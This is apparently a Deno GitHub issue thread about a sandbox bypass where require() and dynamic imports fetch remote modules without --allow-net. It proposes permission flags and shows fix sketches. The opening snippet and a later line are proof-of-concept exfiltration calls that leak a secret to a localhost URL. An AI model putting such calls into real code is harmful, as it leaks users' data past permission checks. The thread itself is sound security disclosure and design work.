```ts
eval(`require(["http://localhost:8080/a.ts?secret=value"], () => {
  console.log("Done");
})`);
export const x = null;
```
As shown above, an attacker can still exfiltrate a user's sensitive data even when the user does not provide the --allow-net option.
We could introduce a new flag (e.g. --allow-require) and return null from _makeLocalRequire() unless the user provides that flag.
https://github.com/denoland/deno/blob/3deaf99a92aeea347e1530f309fd4b226e9677d3/js/compiler.ts#L305-L331
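A flag-gated require could look roughly like the sketch below. The type names AmdCallback/AmdErrback echo those in js/compiler.ts but are redefined here, and makeLocalRequire with its parameters is a hypothetical stand-in for _makeLocalRequire(), not the actual implementation:

```ts
// Hypothetical sketch: gate the AMD-style require behind a flag.
type AmdCallback = (...args: unknown[]) => void;
type AmdErrback = (err: Error) => void;
type AmdRequire = (
  deps: string[],
  callback: AmdCallback,
  errback: AmdErrback
) => void;

function makeLocalRequire(
  allowRequire: boolean,
  realRequire: AmdRequire
): AmdRequire {
  if (allowRequire) {
    return realRequire;
  }
  // Rather than returning null, hand back a stub that reports the
  // missing permission through the errback.
  return (_deps, _callback, errback) => {
    errback(
      new Error("Dynamic require is not allowed. Run with --allow-require.")
    );
  };
}
```

Returning a stub instead of null keeps callers from crashing on a null call and surfaces a clear permission error instead.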
Yes, this is indeed a problem, also with dynamic imports. I don't like --allow-require because it introduces the term "require" into a platform where users might only know "import". What about --allow-dynamic-imports? Maybe it's simpler to require --allow-net for dynamic imports.
I'm +1 on --allow-dynamic-imports, but requiring users to provide --allow-net makes the situation even worse!
Because there is no _local_ package manager such as npm, a lot of projects will depend on remote module loading, so every (or almost every) project will require --allow-net, which decreases security.
People will create aliases like alias deno="deno --allow-net" because they will get frustrated typing --allow-net for every single execution :(
Users can always ignore everything and put all the flags in an alias; I don't think it's possible to protect developers from themselves. --allow-net kind of makes sense here because it is a network call.
I'm just thinking out loud here 😊
I would be 👍 on --allow-dynamic-imports. In my opinion, just as imports of https:// URLs are transparent to the user without needing --allow-net, this really shouldn't be a userland security concern.
Instead of just passing undefined/null, it would be better to return a function that simply calls the errback with an error indicating the need to enable the feature.
I suggest handling this on the privileged side. Currently, we can send a signal from TS to Rust saying we've loaded all the allowed modules:
https://github.com/denoland/deno/blob/8020f5fc0b27bf229544461ab885494233e0e4ef/js/compiler.ts#L577-L589
We just need to add a sendSync() call before calling _drainRunQueue(). After receiving that message in Rust, handle_code_fetch() should check whether the user provided the --allow-dynamic-imports flag each time it is called.
https://github.com/denoland/deno/blob/8020f5fc0b27bf229544461ab885494233e0e4ef/src/handlers.rs#L164-L173
I don't know what happens after landing #693, @kitsonk any thoughts?
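The two-phase flow proposed above can be modeled in one process for illustration. This is a hypothetical sketch, not the real code: CodeFetchGate, signalStaticModulesLoaded, and handleCodeFetch are invented names standing in for the sendSync() signal, _drainRunQueue(), and Rust's handle_code_fetch() respectively:

```ts
// Hypothetical model of the proposed handshake: once the statically
// known modules are loaded, the runtime flips into "dynamic" mode,
// and every subsequent code fetch is checked against the flag.
class CodeFetchGate {
  private staticPhase = true;
  constructor(private allowDynamicImports: boolean) {}

  // TS side would send this signal right before _drainRunQueue():
  // all statically resolvable modules have been fetched.
  signalStaticModulesLoaded(): void {
    this.staticPhase = false;
  }

  // Stand-in for handle_code_fetch() on the privileged side.
  handleCodeFetch(specifier: string): string {
    if (!this.staticPhase && !this.allowDynamicImports) {
      throw new Error(
        `Dynamic load of "${specifier}" denied; ` +
          `re-run with --allow-dynamic-imports`
      );
    }
    return `// source of ${specifier}`;
  }
}
```

With this model, static fetches always succeed; after the signal, fetches are only allowed when the flag was given.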
I think #693 is going to be stalled for a while because of the performance stuff. Even then, there would still be a _drainRunQueue(), so that proposed flow could still work, but that wasn't where I was thinking. I was thinking more here:
https://github.com/denoland/deno/blob/35bc9ddf636734a424b8f69ca7a49af071193002/js/compiler.ts#L225-L227
Especially since it is a flag. If --allow-dynamic-imports is not set, then instead of the local require, we would return something like:

```ts
return (
  deps: ModuleSpecifier[],
  callback: AmdCallback,
  errback: AmdErrback
): void => {
  errback(new Error("Dynamic import not allowed."));
};
```
I have a question, although it may not be appropriate to ask here: how does TypeScript run in Deno? Is TS transpiled to JS and then handed to V8, or is TS run directly? Sorry for my English.
Deno does not keep query parameters in its cache right now; maybe it's a bug?
If it's not, doesn't it make sense to show an error if a URL has query parameters?
It does not matter; the secret can still be part of the URL itself:

```ts
require(["http://localhost:8080/secret_value.js"]);
```
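The point above generalizes: any component of a URL can carry data, so rejecting or stripping query strings alone does not stop exfiltration. A toy illustration (exfiltrationUrl is a hypothetical name, not anything in Deno):

```ts
// Encode a secret into the path component rather than the query
// string; the remote server still receives it either way.
function exfiltrationUrl(base: string, secret: string): string {
  return `${base}/${encodeURIComponent(secret)}.js`;
}
```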
Is anyone working on this? Can I take it up?
Go through the README. Deno uses flatbuffers for communication between TS, Rust, and C.
@cedric05 it works a bit like this:
- js/main.ts and its dependencies are transpiled into JavaScript at build time (this includes the TypeScript compiler). This includes the code for the communication to Rust using flatbuffers.
- That JavaScript is run, which creates a load of JavaScript objects, and then a snapshot of the memory is created and embedded into the deno binary.
- On startup, Rust invokes denoMain() from js/main.ts and sends the startup message, which denoMain() processes.
- denoMain() will get to the end of the function, where compiler.run() is invoked with the main module that has been passed on the command line.
- The DenoCompiler class in js/compiler.ts is an abstraction over the TypeScript compiler. When it is asked to "run" a module, it first resolves it.
- It uses codeFetch in js/os.ts to get the module. This communicates to Rust via flatbuffers.
- The resulting code is passed back via js/os.ts to codeCache, which will tell Rust to cache the source code and the transpiled code.

@ry is this still relevant with ES modules landed?
dynamic import support was removed...
Let's close this. We can start a new one if I forget to properly permission dynamic import when I do it.
Adding dynamic import would make creating a custom AWS Lambda runtime easier, as Amazon defines the function location and handler in a bunch of env variables, meaning you have to import(dir + handler), etc.
Maybe time to reopen this?
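To illustrate the Lambda use case: the handler location only becomes known at runtime from environment variables (the names _HANDLER and LAMBDA_TASK_ROOT follow AWS's documented custom-runtime convention; parseHandler itself is a hypothetical helper, not AWS or Deno API):

```ts
// Hypothetical sketch of a custom-runtime bootstrap resolving its
// handler. AWS sets _HANDLER to "file.export", e.g. "index.handler",
// and LAMBDA_TASK_ROOT to the directory containing the code.
function parseHandler(
  handlerSpec: string,
  taskRoot: string
): { modulePath: string; exportName: string } {
  const dot = handlerSpec.lastIndexOf(".");
  const file = handlerSpec.slice(0, dot);
  const exportName = handlerSpec.slice(dot + 1);
  return { modulePath: `${taskRoot}/${file}.js`, exportName };
}

// The actual load then has to be a dynamic import, since the path
// is not a static string literal:
//   const mod = await import(modulePath);
//   const handler = mod[exportName];
```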